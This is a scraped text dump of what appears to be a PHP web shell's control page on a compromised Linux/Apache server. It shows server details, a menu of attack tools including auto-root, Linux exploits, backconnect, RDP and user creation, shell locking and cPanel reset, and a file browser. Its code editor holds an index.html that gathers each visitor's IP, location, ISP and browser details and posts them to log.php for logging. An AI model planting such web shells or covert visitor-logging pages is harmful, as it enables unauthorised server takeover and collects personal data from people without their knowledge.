Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.117.132.49
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
afra /
ip.siamweeds.com /
[ HOME SHELL ]
Name
Size
Permission
Action
image
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
conn_ip.log
19.33
KB
-rw-r--r--
game.html
6.08
KB
-rw-r--r--
index.html
3.43
KB
-rw-r--r--
log.php
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>IP and Device Information</title> <script> // Function to fetch IP and geolocation async function fetchIPDetails() { try { // Fetch IP and Geolocation information from a public API const response = await fetch('https://ipapi.co/json/'); const data = await response.json(); // Extract relevant information const ip = data.ip; const city = data.city || "N/A"; const region = data.region || "N/A"; const country = data.country_name || "N/A"; const postal = data.postal || "N/A"; const isp = data.org || "N/A"; const timezone = data.timezone || "N/A"; const utc_offset = data.utc_offset || "N/A"; const latitude = data.latitude || "N/A"; const longitude = data.longitude || "N/A"; const hostname = data.hostname || "N/A"; // Fetch Browser and System Info const browser = navigator.userAgent; const platform = navigator.platform; // Display information on the page document.getElementById("ip-info").innerHTML = ` <p><strong>IP Address:</strong> ${ip}</p> <p><strong>City:</strong> ${city}</p> <p><strong>Region:</strong> ${region}</p> <p><strong>Country:</strong> ${country}</p> <p><strong>Postal Code:</strong> ${postal}</p> <p><strong>ISP:</strong> ${isp}</p> <p><strong>Timezone:</strong> ${timezone}</p> <p><strong>UTC Offset:</strong> ${utc_offset}</p> <p><strong>Latitude:</strong> ${latitude}</p> <p><strong>Longitude:</strong> ${longitude}</p> <p><strong>Hostname:</strong> ${hostname}</p> <p><strong>Browser Info:</strong> ${browser}</p> <p><strong>Operating System:</strong> ${platform}</p> `; // Send data to the server for logging await fetch('log.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ ip, city, region, country, postal, isp, timezone, utc_offset, latitude, longitude, hostname, browser, platform }) }); } catch (error) { console.error("Error fetching IP details:", error); document.getElementById("ip-info").innerHTML = ` <p>Error fetching IP details. Please try again later.</p> `; } } // Call function on page load window.onload = fetchIPDetails; </script> </head> <body> <h1>Visitor Information</h1> <div id="ip-info"> <p>Loading your details...</p> </div> </body> </html>
Close